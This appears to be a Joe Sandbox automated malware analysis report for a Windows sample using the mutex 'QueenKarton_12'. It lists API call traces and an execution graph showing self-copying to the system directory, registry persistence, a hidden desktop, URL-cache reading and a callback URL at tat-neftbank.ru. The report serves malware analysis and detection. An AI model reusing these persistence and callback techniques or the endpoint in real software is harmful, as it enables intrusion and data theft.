                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandlePointerWrite
                            • String ID:
                            • API String ID: 3604237281-0
                            • Opcode ID: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction ID: cf1cf3c615f6ac6775c7614bbea78a1f327309af87cada33f382846b8ae172d8
                            • Opcode Fuzzy Hash: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction Fuzzy Hash: 1BF0E972B442143AE62029758C03FDE355D8B41B78F144131FB10FB1D1D5B8BA0142AD
                            APIs
                            • GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • _sleep.CRTDLL(00000000), ref: 00401985
                            Strings
                            • Microsoft Internet Explorer, xrefs: 004018E9
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: TextWindow_sleep
                            • String ID: Microsoft Internet Explorer
                            • API String ID: 2600969163-3125735337
                            • Opcode ID: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction ID: b939d44f97a8665b9279395720dceab0b5e56fea97a4cdd5017e5321b1dcff8d
                            • Opcode Fuzzy Hash: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction Fuzzy Hash: 0B511D71A00215EFDB20CFA8D884BAAB7F4BB18315F5041B6E904E72A0D7749995CF59
                            APIs
                              • Part of subcall function 00406753: CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                              • Part of subcall function 00406753: GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                              • Part of subcall function 00406753: CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                            • _sleep.CRTDLL(000927C0,00418E30,http://tat-neftbank.ru/kkq.php,ofs_kk), ref: 00406854
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize_sleep
                            • String ID: http://tat-neftbank.ru/kkq.php$ofs_kk
                            • API String ID: 4235044784-1201080362
                            • Opcode ID: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction ID: fffe33e14b07b0123592d698d33e8a34a507cc30d1f0c5c96ad3af2b43ec03e4
                            • Opcode Fuzzy Hash: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction Fuzzy Hash: ADD05E72B453043B9200757E9D07929F5CE4AA0AA83B9446BBA01F73F1E8F89E1151AB

                            Execution Graph

                            Execution Coverage:5.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0%
                            Total number of Nodes:542
                            Total number of Limit Nodes:2
                            execution_graph 2707 403840 printf 2708 403880 2707->2708 2709 403884 printf 2708->2709 2710 40386d printf 2708->2710 2710->2708 2716 4052e0 2717 4052ec strcat strcat 2716->2717 2733 40431f 2717->2733 2720 405360 2721 40537c CreateProcessA 2720->2721 2722 405469 2721->2722 2723 4053ac CloseHandle sprintf 2721->2723 2724 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 2722->2724 2725 405413 2723->2725 2726 4054d0 2724->2726 2727 4053e5 FindWindowA 2725->2727 2728 40541d 2725->2728 2727->2728 2729 405402 Sleep 2727->2729 2728->2722 2730 405421 Sleep 2728->2730 2729->2725 2731 405434 Sleep 2730->2731 2732 40543e GetWindowTextA 2730->2732 2731->2732 2732->2722 2734 404341 GetCurrentThreadId GetThreadDesktop 2733->2734 2735 404364 CreateDesktopA 2733->2735 2736 40438e SetThreadDesktop 2734->2736 2737 40435f memset 2734->2737 2735->2736 2735->2737 2736->2737 2737->2720 2737->2721 2840 401581 2841 4015c8 2840->2841 2842 4015a2 rand 2841->2842 2843 4015cc 2841->2843 2842->2841 2738 403562 GetModuleFileNameA 2739 403588 2738->2739 3000 402ba3 3002 402a89 3000->3002 3001 402cd2 3002->3001 3003 402cad GetCurrentProcessId 3002->3003 3004 402b2a GetModuleHandleA GetProcAddress 3002->3004 3003->3002 3004->3002 2740 4077e4 2741 407808 2740->2741 2748 40789e 2740->2748 2742 407820 SetFocus 2741->2742 2743 40782b 2741->2743 2741->2748 2742->2743 2744 407833 SetFocus 2743->2744 2745 40783e 2743->2745 2744->2745 2746 407857 2745->2746 2747 40784c SetFocus 2745->2747 2749 40786a 2746->2749 2750 40785f SetFocus 2746->2750 2747->2746 2753 407910 2748->2753 2754 4078fe CallWindowProcA 2748->2754 2751 407872 SetFocus 2749->2751 2752 40787d 2749->2752 2750->2749 2751->2752 2752->2748 2755 407885 SetFocus 2752->2755 2754->2753 2755->2748 2844 405c09 lstrlenA GetTickCount srand 2877 40509b 2844->2877 2849 405f54 2850 405caf ExpandEnvironmentStringsA 2891 40570c 2850->2891 2853 405ceb strcat strcat 2854 40431f 4 API calls 2853->2854 2855 405d14 memset 
2854->2855 2856 405d72 CreateProcessA 2855->2856 2857 405d56 2855->2857 2858 405da2 CloseHandle sprintf 2856->2858 2859 405f24 DeleteFileA TerminateProcess CloseHandle 2856->2859 2857->2856 2860 405e09 2858->2860 2859->2849 2861 405e13 2860->2861 2862 405ddb FindWindowA 2860->2862 2861->2859 2864 405e1b Sleep GetWindowTextA 2861->2864 2862->2861 2863 405df8 Sleep 2862->2863 2863->2860 2865 405e50 2864->2865 2865->2859 2930 405613 2865->2930 2867 405e6b 2867->2859 2868 405e76 CopyFileA 2867->2868 2869 403619 5 API calls 2868->2869 2870 405e9c DeleteFileA lstrlenA strncmp 2869->2870 2871 405ec6 lstrlenA 2870->2871 2872 405eef 2870->2872 2938 403743 CreateFileA 2871->2938 2874 403743 4 API calls 2872->2874 2875 405eea LocalFree 2874->2875 2875->2859 2878 4050ea 2877->2878 2879 4050b6 sprintf 2878->2879 2880 4050f8 2878->2880 2941 4041f4 2879->2941 2882 4041f4 4 API calls 2880->2882 2883 40510e 2882->2883 2944 4041c3 lstrlenA 2883->2944 2886 40429c RegOpenKeyExA 2887 4042e0 RegQueryValueExA 2886->2887 2890 4042dc 2886->2890 2888 404304 RegCloseKey 2887->2888 2889 4042f8 RegCloseKey 2887->2889 2888->2890 2889->2890 2890->2849 2890->2850 2892 4079e4 2891->2892 2893 405719 GetTempPathA 2892->2893 2894 405746 2893->2894 2894->2894 2952 4015ea 2894->2952 2897 405798 strcat 2898 4057ac rand 2897->2898 2899 4057e7 rand 2898->2899 2900 4057be rand sprintf 2898->2900 2901 4057f9 strcat 2899->2901 2902 40580d strcat rand 2899->2902 2900->2899 2901->2902 2903 405839 strcat 2902->2903 2904 40584d rand 2902->2904 2903->2904 2905 405888 sprintf rand 2904->2905 2906 40585f rand sprintf 2904->2906 2907 4058c3 strcat 2905->2907 2908 4058d7 strcat rand 2905->2908 2906->2905 2907->2908 2909 405911 strcat rand 2908->2909 2910 4058fd strcat 2908->2910 2911 405966 strcat rand 2909->2911 2912 40593d rand sprintf 2909->2912 2910->2909 2913 4059a0 strcat rand 2911->2913 2914 40598c strcat 2911->2914 2912->2911 2915 4059d2 strcat 2913->2915 2916 4059e6 strcat rand 2913->2916 2914->2913 
2915->2916 2917 405a20 sprintf rand 2916->2917 2918 405a0c strcat 2916->2918 2919 405a70 strcat rand 2917->2919 2920 405a5c strcat 2917->2920 2918->2917 2921 405ab0 rand sprintf rand 2919->2921 2922 405a9c strcat 2919->2922 2920->2919 2923 405af3 strcat 2921->2923 2924 405b07 strcat rand 2921->2924 2922->2921 2923->2924 2925 405b39 strcat 2924->2925 2926 405b4d rand 2924->2926 2925->2926 2927 405b88 strcat CreateFileA lstrlenA WriteFile CloseHandle 2926->2927 2928 405b5f rand sprintf 2926->2928 2929 405c04 2927->2929 2928->2927 2929->2849 2929->2853 2931 4079e4 2930->2931 2932 405620 FindFirstUrlCacheEntryA 2931->2932 2933 405663 _stricmp 2932->2933 2934 405685 2932->2934 2933->2934 2935 4056a7 FindNextUrlCacheEntryA 2933->2935 2934->2867 2935->2934 2936 4056c9 _stricmp 2935->2936 2936->2934 2937 4056fb 2936->2937 2937->2935 2939 403775 2938->2939 2940 403779 SetFilePointer WriteFile CloseHandle 2938->2940 2939->2875 2940->2939 2947 40421f RegCreateKeyExA 2941->2947 2945 40421f 4 API calls 2944->2945 2946 4041ee InterlockedIncrement memset 2945->2946 2946->2886 2948 404262 RegSetValueExA 2947->2948 2949 404219 2947->2949 2950 404288 RegCloseKey 2948->2950 2951 40427c RegCloseKey 2948->2951 2949->2878 2950->2949 2951->2949 2953 401634 2952->2953 2954 401638 strcat sprintf rand 2953->2954 2955 40160e rand 2953->2955 2954->2897 2954->2898 2955->2953 3005 4037aa 3007 4037c8 printf printf 3005->3007 3008 40380d 3007->3008 3009 4037fa printf 3008->3009 3011 403812 printf 3008->3011 3009->3008 3012 4035ab 3013 4079e4 3012->3013 3014 4035b8 vsprintf 3013->3014 3017 4035f9 MessageBoxA 3014->3017 3016 4035ea 3017->3016 2756 40686c lstrlenA 2757 405f5b 9 API calls 2756->2757 2758 40689a 2757->2758 2759 4068a1 WinExec 2758->2759 2760 4068a9 2758->2760 2759->2760 2956 40328f 2957 402efd 2956->2957 2958 402cd7 3 API calls 2957->2958 2959 4033ce 2957->2959 2960 40289a 4 API calls 2957->2960 2961 4030e5 GetModuleHandleA 2957->2961 2962 40314c VirtualQuery 2957->2962 2964 402f98 
GlobalMemoryStatus 2957->2964 2965 402f6f IsBadReadPtr 2957->2965 2966 403059 CloseHandle 2957->2966 2958->2957 2960->2957 2961->2957 2962->2957 2963 4031b1 IsBadWritePtr 2962->2963 2963->2957 2964->2957 2965->2957 2966->2957 2967 407892 2968 40789e 2967->2968 2969 407910 2968->2969 2970 4078fe CallWindowProcA 2968->2970 2970->2969 3018 405133 10 API calls 3019 40429c 4 API calls 3018->3019 3020 405264 3019->3020 3021 405278 3020->3021 3022 40526b LocalFree 3020->3022 3024 40509b 6 API calls 3021->3024 3023 4054d0 3022->3023 3025 40527d ExpandEnvironmentStringsA 3024->3025 3044 404532 3025->3044 3028 4052d3 LocalFree 3028->3023 3029 4052ec strcat strcat 3030 40431f 4 API calls 3029->3030 3031 405315 memset 3030->3031 3032 405360 3031->3032 3033 40537c CreateProcessA 3031->3033 3032->3033 3034 4053ac CloseHandle sprintf 3033->3034 3043 405469 3033->3043 3036 405413 3034->3036 3035 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 3035->3023 3037 4053e5 FindWindowA 3036->3037 3038 40541d 3036->3038 3037->3038 3039 405402 Sleep 3037->3039 3040 405421 Sleep 3038->3040 3038->3043 3039->3036 3041 405434 Sleep 3040->3041 3042 40543e GetWindowTextA 3040->3042 3041->3042 3042->3043 3043->3035 3045 40453f 3044->3045 3046 403619 5 API calls 3045->3046 3047 404570 3046->3047 3048 404579 3047->3048 3049 404596 lstrlenA LocalAlloc GetTempPathA 3047->3049 3050 404589 LocalFree 3047->3050 3048->3028 3048->3029 3051 404604 3049->3051 3050->3048 3051->3051 3052 4015ea rand 3051->3052 3053 40461d strcat sprintf rand 3052->3053 3054 404655 strcat 3053->3054 3055 404668 rand 3053->3055 3054->3055 3056 40467a rand sprintf 3055->3056 3057 40469d rand 3055->3057 3056->3057 3058 4046bb strcat 3057->3058 3059 4046ce strcat rand 3057->3059 3058->3059 3060 4046f3 strcat 3059->3060 3061 404706 rand 3059->3061 3060->3061 3062 404741 sprintf rand 3061->3062 3063 40471e rand sprintf 3061->3063 3064 404770 strcat 3062->3064 3065 404783 strcat rand 3062->3065 3063->3062 3064->3065 3066 
4047a8 strcat 3065->3066 3067 4047bb strcat rand 3065->3067 3066->3067 3068 4047e6 rand sprintf 3067->3068 3069 404809 rand sprintf sprintf rand 3067->3069 3068->3069 3070 404859 rand sprintf 3069->3070 3071 40487c rand 3069->3071 3070->3071 3072 404894 strcat 3071->3072 3073 4048a7 rand 3071->3073 3072->3073 3074 4048b9 strcat 3073->3074 3075 4048cc rand 3073->3075 3074->3075 3076 4048f1 sprintf rand 3075->3076 3077 4048de strcat 3075->3077 3078 404926 strcat 3076->3078 3079 404939 rand 3076->3079 3077->3076 3078->3079 3080 40494b strcat 3079->3080 3081 40495e rand 3079->3081 3080->3081 3082 404976 rand sprintf 3081->3082 3083 404999 3081->3083 3082->3083 3089 4049a3 3083->3089 3110 404b12 3083->3110 3084 404b07 3086 404c87 strcat rand 3084->3086 3085 4043bf 2 API calls 3085->3110 3087 404cac strcat 3086->3087 3088 404cbf rand 3086->3088 3087->3088 3092 404cd1 strcat 3088->3092 3093 404ce4 rand 3088->3093 3089->3084 3090 404a4b sprintf rand 3089->3090 3091 4049d9 sprintf 3089->3091 3094 404a82 strcat 3090->3094 3095 404a95 rand 3090->3095 3091->3089 3092->3093 3097 404cf6 strcat 3093->3097 3098 404d09 strcat rand 3093->3098 3094->3095 3099 404aa7 strcat 3095->3099 3100 404aba rand 3095->3100 3096 404b47 sprintf 3096->3110 3097->3098 3101 404d34 rand sprintf 3098->3101 3102 404d57 rand 3098->3102 3099->3100 3100->3089 3103 404acc strcat 3100->3103 3101->3102 3104 404d69 strcat 3102->3104 3105 404d7c rand 3102->3105 3103->3089 3104->3105 3106 404da1 rand 3105->3106 3107 404d8e strcat 3105->3107 3108 404db9 strcat 3106->3108 3109 404dcc rand 3106->3109 3107->3106 3108->3109 3111 404e01 strcat rand 3109->3111 3112 404dde rand sprintf 3109->3112 3110->3085 3110->3086 3110->3096 3137 40447a lstrlenA LocalAlloc 3110->3137 3114 404e2c strcat 3111->3114 3115 404e3f strcat rand 3111->3115 3112->3111 3114->3115 3117 404e64 strcat 3115->3117 3118 404e77 strcat rand 3115->3118 3117->3118 3121 404ea2 strcat 3118->3121 3122 404eb5 sprintf rand 3118->3122 3119 404c02 rand 3123 
404c14 strcat 3119->3123 3124 404c27 rand 3119->3124 3120 404bef strcat 3120->3119 3121->3122 3127 404ee3 strcat 3122->3127 3128 404ef6 strcat rand 3122->3128 3123->3124 3125 404c39 strcat 3124->3125 3126 404c4c LocalFree 3124->3126 3125->3126 3126->3110 3127->3128 3129 404f27 strcat 3128->3129 3130 404f3a rand sprintf rand 3128->3130 3129->3130 3131 404f77 strcat 3130->3131 3132 404f8a strcat rand 3130->3132 3131->3132 3133 404fb5 strcat 3132->3133 3134 404fc8 rand 3132->3134 3133->3134 3135 404fda rand sprintf 3134->3135 3136 404ffd 7 API calls 3134->3136 3135->3136 3136->3048 3138 4044b6 3137->3138 3139 4044d9 sprintf 3138->3139 3140 40452a sprintf rand 3138->3140 3139->3138 3140->3119 3140->3120 3141 401b33 3144 401aa4 3141->3144 3142 401b13 3143 401ae6 sprintf 3146 40129c 3143->3146 3144->3142 3144->3143 3147 4012a9 CreateFileA 3146->3147 3148 4079e4 3146->3148 3149 4012db ReadFile CloseHandle 3147->3149 3150 4012d7 3147->3150 3148->3147 3149->3150 3150->3142 3151 4036b3 CreateFileA 3152 4036e3 3151->3152 3153 4036e7 SetFilePointer 3151->3153 3154 403701 3153->3154 3154->3154 3155 403708 WriteFile WriteFile CloseHandle 3154->3155 3155->3152 2761 406ff6 2762 4071a4 2761->2762 2763 40701f 2761->2763 2764 40717e 2762->2764 2765 4071be DestroyWindow 2762->2765 2766 407021 2763->2766 2767 40702f 2763->2767 2765->2764 2768 407184 2766->2768 2769 40702a 2766->2769 2770 407289 GetWindowTextA 2767->2770 2771 40703a 2767->2771 2768->2764 2772 407198 PostQuitMessage 2768->2772 2773 4077cc DefWindowProcA 2769->2773 2776 4072c9 GetWindowTextA 2770->2776 2777 4072a9 MessageBoxA SetFocus 2770->2777 2774 407041 2771->2774 2775 40705c 2771->2775 2772->2764 2773->2764 2774->2769 2774->2773 2781 4071cb 2774->2781 2780 407149 2775->2780 2817 405ffa 2775->2817 2778 407322 2776->2778 2779 407302 MessageBoxA SetFocus 2776->2779 2777->2764 2785 407337 MessageBoxA SetFocus 2778->2785 2794 407357 2778->2794 2779->2764 2780->2764 2824 406075 2780->2824 2781->2764 2787 407224 
SetTextColor 2781->2787 2789 407233 SetTextColor 2781->2789 2785->2764 2786 405ffa 3 API calls 2788 40709b GetWindowRect 2786->2788 2790 40723d SetBkColor CreateBrushIndirect 2787->2790 2788->2780 2791 4070be GetWindowRect 2788->2791 2789->2790 2790->2764 2791->2780 2793 4070d4 2791->2793 2792 4073a7 sprintf GetWindowTextA 2796 40740f sprintf GetWindowTextA 2792->2796 2797 4073ef MessageBoxA SetFocus 2792->2797 2793->2780 2798 407112 MoveWindow 2793->2798 2794->2792 2795 407376 MessageBoxA SetFocus 2794->2795 2795->2764 2799 407477 sprintf GetWindowTextA 2796->2799 2800 407457 MessageBoxA SetFocus 2796->2800 2797->2764 2798->2780 2801 4074d9 2799->2801 2802 4074b9 MessageBoxA SetFocus 2799->2802 2800->2764 2803 4074ee MessageBoxA SetFocus 2801->2803 2805 40750e 2801->2805 2802->2764 2803->2764 2804 40755e sprintf GetWindowTextA 2807 4075a6 MessageBoxA SetFocus 2804->2807 2808 4075c6 2804->2808 2805->2804 2806 40752d MessageBoxA SetFocus 2805->2806 2806->2764 2807->2764 2809 407627 sprintf CreateFileA SetFilePointer 2808->2809 2810 4075e5 MessageBoxA SetFocus 2808->2810 2811 40768e 2809->2811 2810->2764 2811->2811 2812 407695 WriteFile WriteFile 2811->2812 2813 4076db 2812->2813 2813->2813 2814 4076e2 6 API calls 2813->2814 2815 40776e 2814->2815 2815->2815 2816 407775 WriteFile WriteFile CloseHandle ShowWindow 2815->2816 2816->2764 2818 4079e4 2817->2818 2819 406007 GetWindow 2818->2819 2821 406020 2819->2821 2820 406028 GetClassNameA 2820->2821 2821->2820 2822 406024 2821->2822 2823 40605f GetWindow 2821->2823 2822->2786 2823->2821 2825 405ffa 3 API calls 2824->2825 2826 406096 2825->2826 2827 405ffa 3 API calls 2826->2827 2828 4060a3 10 API calls 2827->2828 2829 406224 SendMessageA 2828->2829 2830 40623a SendMessageA 2828->2830 2831 40624e CreateWindowExA CreateWindowExA 2829->2831 2830->2831 2832 406333 2831->2832 2833 4062cb sprintf SendMessageA sprintf SendMessageA 2832->2833 2834 40633c 34 API calls 2832->2834 2833->2832 2834->2764 2971 401219 2972 40121f 
__GetMainArgs 2971->2972 2973 407980 173 API calls 2972->2973 2974 401284 exit 2973->2974 2975 40109a 2983 40109b 2975->2983 2976 40117f 2977 40118e signal 2976->2977 2978 4011a8 signal 2977->2978 2979 4011c9 2977->2979 2978->2979 2980 40117b 2978->2980 2979->2980 2981 4011ce signal raise 2979->2981 2981->2980 2983->2976 2983->2977 2983->2980 2984 40107a RtlUnwind 2983->2984 2984->2983 2835 40237b 2836 402333 _sleep 2835->2836 2837 402355 2835->2837 2838 401b9f 23 API calls 2836->2838 2839 40234c 2838->2839 2839->2836 2839->2837 2985 40109b 2986 40117f 2985->2986 2993 4010c3 2985->2993 2987 40118e signal 2986->2987 2988 4011a8 signal 2987->2988 2989 4011c9 2987->2989 2988->2989 2990 40117b 2988->2990 2989->2990 2991 4011ce signal raise 2989->2991 2991->2990 2993->2987 2993->2990 2994 40107a RtlUnwind 2993->2994 2994->2993 2995 40129b 2996 4079e4 2995->2996 2997 4012a9 CreateFileA 2996->2997 2998 4012db ReadFile CloseHandle 2997->2998 2999 4012d7 2997->2999 2998->2999 2711 40365e 2712 403664 GetFileSize LocalAlloc 2711->2712 2713 403684 ReadFile CloseHandle 2712->2713 2715 4036ae 2713->2715 2530 40121f __GetMainArgs 2533 407980 GetCommandLineA 2530->2533 2534 407991 strchr 2533->2534 2536 4079a6 2533->2536 2535 4079cf GetModuleHandleA 2534->2535 2534->2536 2539 406c29 OpenMutexA 2535->2539 2536->2535 2540 406c6d GetVersionExA GetSystemDirectoryA GetTickCount srand GetModuleFileNameA 2539->2540 2541 406c5f CloseHandle exit 2539->2541 2542 406cd6 2540->2542 2541->2540 2543 406ce4 rand 2542->2543 2544 406e07 9 API calls 2542->2544 2546 406d5f 2543->2546 2586 402e06 2544->2586 2548 406d69 rand 2546->2548 2549 406d2f rand 2546->2549 2552 406d8a sprintf CopyFileA 2548->2552 2553 406d7c 2548->2553 2549->2546 2550 406f65 2602 4023a7 CreateThread CloseHandle 2550->2602 2551 406f2d GetModuleHandleA GetProcAddress GetCurrentProcessId 2551->2550 2563 403ce9 rand 2552->2563 2553->2552 2557 406f6a CreateThread CloseHandle CreateThread CloseHandle SetTimer 2559 406fdc GetMessageA 
2557->2559 2654 4068b0 2557->2654 2672 40682b 2557->2672 2561 406fc4 TranslateMessage DispatchMessageA 2559->2561 2562 401284 exit 2559->2562 2561->2559 2564 403d27 2563->2564 2565 403d2e 2563->2565 2574 403f68 rand 2564->2574 2603 403619 CreateFileA 2565->2603 2568 403d47 memcpy memset 2570 403da1 rand rand rand rand memcpy 2568->2570 2571 403e64 2570->2571 2609 403bbe 2571->2609 2575 404002 2574->2575 2576 403fd4 rand 2575->2576 2577 404009 rand 2575->2577 2576->2575 2578 40402a 6 API calls 2577->2578 2579 40401c 2577->2579 2614 404148 RegCreateKeyExA 2578->2614 2579->2578 2581 4040f5 2582 404148 3 API calls 2581->2582 2583 404125 2582->2583 2584 404148 3 API calls 2583->2584 2585 40413a WinExec ExitProcess 2584->2585 2587 402e13 2586->2587 2617 402822 6 API calls 2587->2617 2589 402e1b GetVersion 2590 402e2e 2589->2590 2591 402e79 LoadLibraryA GetProcAddress 2590->2591 2601 402ef6 2590->2601 2591->2590 2592 4033ce GetVersion 2592->2550 2592->2551 2594 4030e5 GetModuleHandleA 2594->2601 2595 40314c VirtualQuery 2596 4031b1 IsBadWritePtr 2595->2596 2595->2601 2596->2601 2597 402f98 GlobalMemoryStatus 2597->2601 2598 402f6f IsBadReadPtr 2598->2601 2599 403059 CloseHandle 2599->2601 2601->2592 2601->2594 2601->2595 2601->2597 2601->2598 2601->2599 2618 40289a 2601->2618 2622 402cd7 2601->2622 2602->2557 2631 4022ee 2602->2631 2604 403664 GetFileSize LocalAlloc 2603->2604 2605 40364e 2603->2605 2606 403684 ReadFile CloseHandle 2604->2606 2605->2604 2608 4036ae 2605->2608 2606->2608 2608->2564 2608->2568 2611 403bfd 2609->2611 2610 403ce4 CreateFileA WriteFile CloseHandle LocalFree 2610->2564 2611->2610 2612 403c20 rand 2611->2612 2613 403c80 memset memcpy memcpy 2611->2613 2612->2611 2613->2611 2615 404193 2614->2615 2615->2615 2616 40419a RegSetValueExA RegCloseKey 2615->2616 2616->2581 2617->2589 2619 4028c6 GetSecurityInfo SetEntriesInAclA SetSecurityInfo CloseHandle 2618->2619 2621 4029cd 2619->2621 2621->2601 2623 402ceb 2622->2623 2625 402d13 2623->2625 2626 
402a72 2623->2626 2625->2601 2629 402a89 2626->2629 2627 402cd2 2627->2625 2628 402b2a GetModuleHandleA GetProcAddress 2628->2629 2629->2627 2629->2628 2630 402cad GetCurrentProcessId 2629->2630 2630->2629 2632 402333 _sleep 2631->2632 2636 401b9f 2632->2636 2652 4079e4 2636->2652 2653 4079e5 2652->2653 2653->2653 2669 4068c7 2654->2669 2656 406c0c _sleep 2656->2669 2657 403619 5 API calls 2657->2669 2659 406c01 LocalFree 2659->2656 2660 406941 sscanf 2661 406972 rand 2660->2661 2660->2669 2661->2669 2662 406a84 atoi 2665 406aad sprintf 2662->2665 2662->2669 2663 4069a4 sprintf sprintf 2666 406a27 DeleteFileA sprintf WinExec 2663->2666 2664 4069db GetWindowsDirectoryA sprintf strcat 2664->2666 2665->2669 2666->2669 2667 406add lstrlenA 2667->2669 2668 406b20 sprintf lstrlenA lstrlenA LocalAlloc 2668->2669 2669->2656 2669->2657 2669->2659 2669->2660 2669->2662 2669->2663 2669->2664 2669->2667 2669->2668 2670 406b9b lstrlenA 2669->2670 2671 406bbe CreateThread CloseHandle 2669->2671 2676 405f5b lstrlenA lstrlenA LocalAlloc 2669->2676 2681 4043bf 2669->2681 2670->2669 2671->2669 2673 40683b 2672->2673 2689 406753 CreateFileA 2673->2689 2687 407a04 2676->2687 2678 405f9b lstrlenA 2688 407a04 2678->2688 2680 405fb4 DeleteUrlCacheEntry CreateThread WaitForSingleObject GetExitCodeThread CloseHandle 2680->2669 2682 4043dc 2681->2682 2683 40441a 2682->2683 2685 4043e2 memcpy 2682->2685 2684 404441 lstrlenA 2683->2684 2686 40442f 2683->2686 2684->2686 2685->2686 2686->2669 2687->2678 2688->2680 2690 40678f GetFileSize CloseHandle 2689->2690 2696 40681a _sleep 2689->2696 2697 4013cc RegOpenKeyExA 2690->2697 2696->2673 2698 4013fa 2697->2698 2699 4013fe RegQueryValueExA RegCloseKey 2697->2699 2698->2696 2700 4054d7 6 API calls 2698->2700 2699->2698 2701 405586 2700->2701 2702 4055ce CreateThread WaitForSingleObject GetExitCodeThread CloseHandle 2701->2702 2703 40560e 2702->2703 2703->2696 2704 401348 RegCreateKeyExA 2703->2704 2705 40138a RegSetValueExA RegCloseKey 2704->2705 
2706 401386 2704->2706 2705->2706 2706->2696

                            Control-flow Graph

                            APIs
                            • OpenMutexA.KERNEL32(001F0001,00000000,QueenKarton_12), ref: 00406C50
                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00406C60
                            • exit.CRTDLL(00000001,00000000,00000000), ref: 00406C67
                            • GetVersionExA.KERNEL32(00418D50,00000000), ref: 00406C8A
                            • GetSystemDirectoryA.KERNEL32(00429080,000000FF), ref: 00406C99
                            • GetTickCount.KERNEL32 ref: 00406C9E
                            • srand.CRTDLL(00000000,00418D50,00000000), ref: 00406CA4
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00418D50,00000000), ref: 00406CBE
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D03
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D2F
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D70
                            • sprintf.CRTDLL(?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00406DA8
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00406DBD
                            • WinExec.KERNEL32(?,00000000), ref: 00406DEC
                            • ExitProcess.KERNEL32(00000001,?,?,?,?,?,?,00418D50,00000000), ref: 00406E02
                            • sprintf.CRTDLL(00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E1B
                            • sprintf.CRTDLL(00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E3A
                            • sprintf.CRTDLL(00408020,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E53
                            • LoadCursorA.USER32(00000000,00007F00), ref: 00406E85
                            • LoadIconA.USER32(00000000,00007F03), ref: 00406E9A
                            • GetStockObject.GDI32(00000000), ref: 00406EA8
                            • RegisterClassA.USER32(00000003), ref: 00406EC9
                            • CreateWindowExA.USER32(00000000,QueenKarton,QueenKarton,00CA0000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00408020), ref: 00406EF3
                            • CreateMutexA.KERNEL32(00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406F12
